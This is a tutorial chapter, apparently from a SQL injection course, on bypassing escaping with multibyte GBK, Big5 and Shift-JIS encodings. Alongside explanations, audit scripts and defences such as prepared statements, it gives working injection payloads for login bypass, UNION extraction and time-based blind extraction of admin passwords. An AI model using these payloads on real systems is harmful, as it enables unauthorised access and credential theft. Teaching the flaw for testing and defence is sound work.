Multibyte encoding bypass exploits differences in how components handle character sets to defeat escaping-based SQL injection defenses. This technique primarily affects legacy PHP applications whose database connection uses a double-byte encoding such as GBK (a Chinese character set) instead of UTF-8.

| Encoding Type | Examples | Character Size |
|---|---|---|
| Single-byte | ASCII, Latin1 (ISO-8859-1) | 1 byte per char |
| Multibyte | UTF-8, GBK, Big5 | 1-4 bytes per char (UTF-8); 1-2 bytes per char (GBK, Big5) |
UTF-8 (Variable length):
- ASCII chars: 1 byte (0x00-0x7F)
- Other chars: 2-4 bytes, every byte 0x80 or higher
GBK (Chinese encoding):
- ASCII compatible: 1 byte (0x00-0x7F)
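- Chinese chars: 2 bytes (lead byte 0x81-0xFE, then a trail byte 0x40-0x7E or 0x80-0xFE)

GBK's trail-byte range includes 0x5C, the backslash used for escaping. UTF-8 never uses a byte below 0x80 inside a multibyte character.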
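The attack hinges on a single question: can the escape character end up as the second byte of a character? The minimal sketch below answers it with a hypothetical lookup table of trail-byte ranges. The GBK trail range is 0x40-0x7E and 0x80-0xFE. The Big5 and Shift-JIS values are the commonly cited base ranges and are an assumption here, because vendor variants extend them. The `TRAIL_BYTE_RANGES` table and the `can_follow_lead_byte` helper are illustrative names, not a library API.

```python
# Hypothetical lookup table: inclusive (low, high) ranges for the second
# byte of a multibyte character. Big5/Shift-JIS values are the commonly
# cited base ranges; vendor variants (e.g. CP932, HKSCS) extend them.
TRAIL_BYTE_RANGES = {
    "gbk": [(0x40, 0x7E), (0x80, 0xFE)],
    "big5": [(0x40, 0x7E), (0xA1, 0xFE)],
    "shift_jis": [(0x40, 0x7E), (0x80, 0xFC)],
    # Every non-leading byte of a UTF-8 character is a continuation byte.
    "utf-8": [(0x80, 0xBF)],
}


def can_follow_lead_byte(charset: str, byte: int) -> bool:
    """True if `byte` can be the second byte of a character in `charset`."""
    return any(low <= byte <= high for low, high in TRAIL_BYTE_RANGES[charset])


for name in TRAIL_BYTE_RANGES:
    backslash = can_follow_lead_byte(name, 0x5C)
    quote = can_follow_lead_byte(name, 0x27)
    print(f"{name}: backslash={backslash} quote={quote}")
# gbk: backslash=True quote=False
# big5: backslash=True quote=False
# shift_jis: backslash=True quote=False
# utf-8: backslash=False quote=False
```

The asymmetry in the output is the whole attack: the quote (0x27) can never be swallowed into a double-byte character, but the backslash that escapes it can.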
When different components use different character sets:
| Component | Character Set | Action |
|---|---|---|
| Browser | UTF-8 | Sends request |
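| Server (PHP) | `mysql_real_escape_string()` still assumes a single-byte charset (latin1) | Escapes input byte by byte |
| Database | GBK (set with `SET NAMES gbk`) | Parses and executes query |

The Mismatch: the escaping step treats the input as single-byte characters, while the database parses the same bytes as GBK. The two disagree on where each character begins and ends.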
Byte sequence: 0xBF 0x27
How it works:
| Context | Interpretation |
|---|---|
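| GBK | 0xBF is a lead byte, but 0x27 is not a valid trail byte, so the pair is not one character |
| Latin1 | ¿' (0xBF = ¿, 0x27 = ') |
| GBK, after escaping (0xBF 0x5C 0x27) | 0xBF5C is one valid character, followed by a bare ' |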
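Python's built-in `latin-1` and `gbk` codecs can show these interpretations side by side. In this sketch, Python's `gbk` codec stands in for the database's GBK parser. That is an assumption: MySQL uses its own implementation, which agrees on these byte ranges. The helper `is_valid_gbk` is a hypothetical name.

```python
def is_valid_gbk(data: bytes) -> bool:
    """True if `data` decodes cleanly with Python's gbk codec."""
    try:
        data.decode("gbk")
    except UnicodeDecodeError:
        return False
    return True


raw = b"\xbf\x27"            # what the attacker sends
escaped = b"\xbf\x5c\x27"    # after a byte-wise escape adds 0x5C before 0x27

print(raw.decode("latin-1"))       # ¿'
print(escaped.decode("latin-1"))   # ¿\'
print(is_valid_gbk(raw))           # False: 0x27 is not a GBK trail byte

# Read as GBK, the escaped bytes become one CJK character plus a bare quote.
gbk_view = escaped.decode("gbk")
print(len(gbk_view), gbk_view[-1])  # 2 '
```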
| Step | Action | Result |
|---|---|---|
| 1 | Attacker sends 0xBF27 | Magic bytes injected |
| 2 | `mysql_real_escape_string()` scans byte by byte (assumes latin1) | Sees 0xBF, then a quote |
| 3 | `mysql_real_escape_string()` adds a backslash before the quote | 0xBF5C27 |
| 4 | Database parses the query as GBK | 0xBF5C is read as a single character |
| 5 | 0x27 is no longer escaped | The quote closes the string literal |
| 6 | SQL injection | Payload executes successfully |
Normal Escaping (Safe):
```
Input:  '
Escape: \
Result: \'  ← Backslash escapes quote
```
Multibyte Bypass (Vulnerable):
```
Input:  BF 27        (¿' in latin1)
Escape: BF 5C 27     (¿\' in latin1)
GBK:    [BF5C] [27]  ← BF5C is one char, 27 is an unescaped '
Result: [BF5C]'      ← Quote is FREE!
```
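The escape-then-parse sequence can be simulated to confirm exactly where the string literal ends. This is a simplified model, not MySQL's code. `bytewise_escape` mimics an escaper that assumes a single-byte charset, and `literal_end` is a hypothetical scanner that reads the escaped bytes either byte by byte or with GBK character boundaries. Both names, and the reduced escape table, are assumptions made for illustration.

```python
from typing import Optional

# Simplified model of mysql_real_escape_string() when it believes the
# connection is single-byte: every byte is escaped on its own.
ESCAPES = {
    0x00: b"\\0", 0x0A: b"\\n", 0x0D: b"\\r", 0x1A: b"\\Z",
    0x5C: b"\\\\", 0x27: b"\\'", 0x22: b'\\"',
}


def bytewise_escape(data: bytes) -> bytes:
    """Escape byte by byte, with no notion of multibyte characters."""
    return b"".join(ESCAPES.get(b, bytes([b])) for b in data)


def is_gbk_lead(b: int) -> bool:
    return 0x81 <= b <= 0xFE


def is_gbk_trail(b: int) -> bool:
    return 0x40 <= b <= 0x7E or 0x80 <= b <= 0xFE


def literal_end(body: bytes, charset: str) -> Optional[int]:
    """Scan the bytes that follow an opening quote.

    Returns the index of the quote that closes the literal, or None if the
    whole body stays inside the string. With charset="gbk", a lead byte
    followed by a valid trail byte is consumed as one character.
    """
    i = 0
    while i < len(body):
        b = body[i]
        if (charset == "gbk" and is_gbk_lead(b)
                and i + 1 < len(body) and is_gbk_trail(body[i + 1])):
            i += 2  # one double-byte character
        elif b == 0x5C:
            i += 2  # backslash escapes the next byte
        elif b == 0x27:
            return i  # unescaped quote closes the literal
        else:
            i += 1
    return None


body = bytewise_escape(b"\xbf\x27 OR 1=1-- ")
print(body)                          # b"\xbf\\' OR 1=1-- "
print(literal_end(body, "latin1"))   # None: the quote stays escaped
print(literal_end(body, "gbk"))      # 2: the quote at index 2 ends the literal
```

The same scanner also returns an index under `gbk` for `"中'".encode("utf-8")` (bytes E4 B8 AD 27). That is perfectly valid UTF-8, which shows that validating UTF-8 alone does not protect a connection that the database parses as GBK.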
Payload:
```python
# Python to generate payload
payload = b'\xbf\x27 OR 1=1-- '
```
Result:
```sql
SELECT * FROM users WHERE name = '¿\' OR 1=1-- '
-- Database sees: ... WHERE name = '[BF5C]' OR 1=1-- '
```
Payload (URL-encoded):
```
%BF%27%20%4F%52%20%31%3D%31%2D%2D%20
```
Decodes to (note the trailing space after `--`):
```
¿' OR 1=1-- 
```
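The standard `urllib.parse` functions can confirm that the fully percent-encoded payload and a minimally encoded one carry identical bytes. URL decoding happens before the application ever escapes the value, so either form reaches the escaping step the same way. The trailing space matters: MySQL only treats `--` as a comment when it is followed by whitespace. The variable names below are illustrative.

```python
from urllib.parse import quote_from_bytes, unquote_to_bytes

fully_encoded = "%BF%27%20%4F%52%20%31%3D%31%2D%2D%20"
raw = unquote_to_bytes(fully_encoded)
print(raw)                       # b"\xbf' OR 1=1-- "

# quote_from_bytes() leaves letters, digits and "-" alone, so it produces a
# shorter string that decodes to exactly the same bytes.
minimal = quote_from_bytes(raw)
print(minimal)                   # %BF%27%20OR%201%3D1--%20
print(unquote_to_bytes(minimal) == raw)  # True
```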
Authentication Bypass:
```python
# Username field
username = b'\xbf\x27 OR 1=1 LIMIT 1-- '
```
Query:
```sql
SELECT * FROM users WHERE username = '¿\' OR 1=1 LIMIT 1-- ' AND password = '...'
```
Magic Bytes (similar GBK technique): any GBK lead byte (0x81-0xFE) can replace 0xBF. 0xA1 is also a lead byte in Big5, whose trail bytes (0x40-0x7E, 0xA1-0xFE) likewise include 0x5C.

Payload:
```python
payload = b'\xa1\x27 OR 1=1-- '
```
Shift-JIS Vulnerable Sequences:
```python
# 0x81-0x9F and 0xE0-0xFC are first bytes
payload = b'\x81\x27 OR 1=1-- '
```
Indicators:
- Legacy PHP applications
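- `mysql_set_charset('gbk')` in code (shows GBK is in use, although this call itself keeps escaping charset-aware)
- `SET NAMES gbk` sent to the database as a query (the escaping function is never told about the change)
- Chinese/Japanese/Korean language content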
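The indicators above can be turned into a rough code-audit check. The sketch below is hypothetical. It searches PHP source for a `SET NAMES` query that selects a double-byte charset, then reports whether the file ever calls `mysql_set_charset()` or `mysqli_set_charset()`, the calls that make escaping charset-aware. The charset list is an assumption: it holds the charsets named in this section plus `cp932`, MySQL's name for the Windows variant of Shift-JIS. A regex scan misses charsets set through variables or configuration, so a clean result is inconclusive.

```python
import re

# Charsets (MySQL names) whose trail-byte range includes 0x5C.
# cp932 is MySQL's name for the Windows variant of Shift-JIS.
DOUBLE_BYTE_RISKY = {"gbk", "big5", "sjis", "cp932"}

SET_NAMES_RE = re.compile(r"SET\s+NAMES\s+['\"]?(\w+)", re.IGNORECASE)
SET_CHARSET_CALL_RE = re.compile(r"\bmysqli?_set_charset\s*\(")


def audit_php_source(source: str) -> list:
    """Return human-readable findings for one PHP file's contents."""
    findings = []
    for match in SET_NAMES_RE.finditer(source):
        charset = match.group(1).lower()
        if charset in DOUBLE_BYTE_RISKY:
            findings.append(f"SET NAMES {charset} sent as a query")
    # Only worth reporting when a risky SET NAMES was found.
    if findings and not SET_CHARSET_CALL_RE.search(source):
        findings.append("no mysql_set_charset()/mysqli_set_charset() call: "
                        "escaping is not charset-aware")
    return findings


vulnerable = """
mysql_query("SET NAMES gbk");
$username = mysql_real_escape_string($_GET['user']);
"""
for finding in audit_php_source(vulnerable):
    print(finding)
# SET NAMES gbk sent as a query
# no mysql_set_charset()/mysqli_set_charset() call: escaping is not charset-aware
```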
Code Patterns:
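```php
// Vulnerable pattern: SET NAMES changes the server's charset,
// but the escaping function still assumes latin1
mysql_query("SET NAMES gbk");
$escaped = mysql_real_escape_string($input);
```
Step 1: Check Character Set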
```sql
-- Check database charset
SHOW VARIABLES LIKE 'character_set%';
```
Step 2: Send Test Payload
```
%BF%27
```
Step 3: Observe Error Messages
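| Response | Meaning |
|---|---|
| MySQL syntax error near `'` or at the end of the query | Quote broke out of the string (vulnerable!) |
| Normal response, input treated as literal text | Quote escaped properly (safe) |
| Generic error page or no visible change | Errors may be suppressed; check whether injection succeeded with boolean or time-based payloads |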
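The Step 1 check can be scripted once the `SHOW VARIABLES LIKE 'character_set%'` rows have been fetched with whatever MySQL client you use. The function below is a hypothetical sketch. It takes `(Variable_name, Value)` pairs and flags the session variables that describe how the server reads incoming statements. The risky-charset list is an assumption, matching the charsets discussed in this section. These variables only show the server's side; whether the client library's escaping knows about the charset has to be confirmed in the application code.

```python
# Charsets (MySQL names) whose trail-byte range includes 0x5C.
DOUBLE_BYTE_RISKY = {"gbk", "big5", "sjis", "cp932"}

# Session variables describing how the server decodes incoming statements.
CLIENT_SIDE_VARIABLES = ("character_set_client", "character_set_connection")


def flag_risky_charsets(rows: list) -> dict:
    """Return client/connection charset variables that use a risky charset.

    `rows` are (Variable_name, Value) pairs from
    SHOW VARIABLES LIKE 'character_set%'.
    """
    return {
        name: value
        for name, value in rows
        if name in CLIENT_SIDE_VARIABLES and value.lower() in DOUBLE_BYTE_RISKY
    }


rows = [
    ("character_set_client", "gbk"),
    ("character_set_connection", "gbk"),
    ("character_set_database", "utf8mb4"),
    ("character_set_results", "gbk"),
]
print(flag_risky_charsets(rows))
# {'character_set_client': 'gbk', 'character_set_connection': 'gbk'}
```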
Payload:
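```python
username = b'\xbf\x27 UNION SELECT 1,2,3-- '
```
Query:
```sql
SELECT * FROM users WHERE username = '[BF5C]' UNION SELECT 1,2,3-- '
```
True Condition:
```python
username = b'\xbf\x27 AND 1=1-- '
```
False Condition:
```python
username = b'\xbf\x27 AND 1=2-- '
```
MySQL (time-based):
```python
username = b'\xbf\x27 AND SLEEP(5)-- '
```
PostgreSQL (time-based):
```python
# pg_sleep() returns void, so call it in a subquery that yields a comparable value
username = b'\xbf\x27 AND 1=(SELECT 1 FROM pg_sleep(5))-- '
```
Database: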
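```sql
-- Use UTF-8 for the current connection and as the database default
SET NAMES utf8mb4;
ALTER DATABASE mydb CHARACTER SET utf8mb4;
```
Application (PHP):
```php
// Use UTF-8 and let the client library know about it
mysqli_set_charset($conn, "utf8mb4");
// Or PDO: set the charset in the DSN
$dsn = "mysql:host=localhost;dbname=mydb;charset=utf8mb4";
```
PHP PDO (safe with native prepares, or with emulated prepares when the charset is set in the DSN rather than via `SET NAMES`):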
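```php
// Disable emulated prepares so parameters are sent separately from the query
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$stmt = $pdo->prepare("SELECT * FROM users WHERE name = ?");
$stmt->execute([$username]); // Safe from multibyte bypass
```
PHP MySQLi (Safe):
```php
$stmt = $conn->prepare("SELECT * FROM users WHERE name = ?");
$stmt->bind_param("s", $username);
$stmt->execute();
```
```php
// Reject input that is not valid UTF-8. This only helps when the connection
// charset is also UTF-8: valid UTF-8 such as "中'" (E4 B8 AD 27) still leaves
// an unpaired GBK lead byte (AD) in front of the quote.
function validate_utf8($string) {
    return mb_check_encoding($string, 'UTF-8');
}
if (!validate_utf8($user_input)) {
    die("Invalid encoding");
}
```
```php
function sanitize_multibyte($input) {
    // Blacklist of a few GBK lead bytes. Incomplete: any lead byte in
    // 0x81-0xFE works (e.g. \xa1, \x81), so use this only as defense in depth.
    $dangerous = array("\xbf", "\xc0", "\xc1");
    return str_replace($dangerous, "", $input);
}
```
Vulnerable Code: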
```php
// Common in Chinese PHP CMS
mysql_query("SET NAMES gbk");
$username = mysql_real_escape_string($_GET['user']);
$query = "SELECT * FROM admin WHERE username = '$username'";
```
Exploit:
```
GET /login.php?user=%BF%27%20OR%201=1--%20
```
Result: Authentication bypass
Vulnerable Code:
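```php
// Shift-JIS encoding: the server parses queries as Shift-JIS, but the
// escaping function was never told (no mysql_set_charset() call)
mysql_query("SET NAMES sjis");
$input = mysql_real_escape_string($_GET['q']);
$query = "SELECT * FROM products WHERE name LIKE '%$input%'";
```
Exploit:
```python
payload = b'\x81\x27 UNION SELECT * FROM admin-- '
```
Setup: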
- PHP application with `SET NAMES gbk`
- Login form with username/password
Task:
- Identify GBK encoding
- Send multibyte payload
- Bypass authentication
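Payload (send it in the raw request; typed into the form field, each `%` would be re-encoded as `%25`):
```
Username: %BF%27%20OR%201=1--%20
Password: anything
```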
Setup:
- Search function using GBK
- Vulnerable to multibyte bypass
Task:
- Confirm multibyte injection
- Extract column count
- Dump admin credentials
Payload:
```python
search = b'\xbf\x27 UNION SELECT username,password FROM admin-- '
```
Setup:
- Blind SQL injection via multibyte
- No error messages
Task:
- Use time-based detection
- Confirm injection with delays
- Extract data character by character
Payload:
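```python
# Test for 'a': the response is delayed only if the first character matches
username = b'\xbf\x27 AND IF((SELECT SUBSTRING(password,1,1) FROM admin LIMIT 1) = CHAR(97), SLEEP(5), 0)-- '
```
- Multibyte encodings can bypass escaping - Character set confusion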
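- GBK 0xBF27 is the classic bypass - Escaping turns it into 0xBF5C27, and 0xBF5C is a valid multibyte char
- UTF-8 is the defense - 0x5C never appears inside a UTF-8 multibyte character, so consistent UTF-8 prevents the bypass
- Native prepared statements are safe - Regardless of encoding (PDO with emulated prepares is not safe if the charset is set via `SET NAMES`)
- Legacy PHP apps most at risk - Modern apps use UTF-8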
This vulnerability primarily affects:
- PHP 5.x with `mysql_*` functions
- Applications using GBK/Big5/Shift-JIS
- Legacy systems not updated to UTF-8
Modern applications using UTF-8 consistently and prepared statements are not vulnerable to this specific attack vector.
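Here is a sketch of why binding sidesteps the problem entirely, using Python's built-in `sqlite3` module. SQLite is swapped in only because it needs no server; the examples in this section target MySQL. The table and values are illustrative. With a `?` placeholder the payload travels as a value, so there is no escaping step for a charset mismatch to corrupt.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users (name) VALUES ('admin')")

# The classic payload, decoded as latin-1 so it can be bound as text: "¿' OR 1=1-- "
payload = b"\xbf\x27 OR 1=1-- ".decode("latin-1")

# Bound parameter: compared as a literal string, never parsed as SQL.
matches = conn.execute("SELECT name FROM users WHERE name = ?", (payload,)).fetchall()
print(matches)  # []

# Storing it works too; the quote is just data.
conn.execute("INSERT INTO users (name) VALUES (?)", (payload,))
stored = conn.execute("SELECT COUNT(*) FROM users WHERE name = ?", (payload,)).fetchone()[0]
print(stored)  # 1
conn.close()
```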
Continue to 21 - NoSQL Injection to learn about non-relational database injection techniques.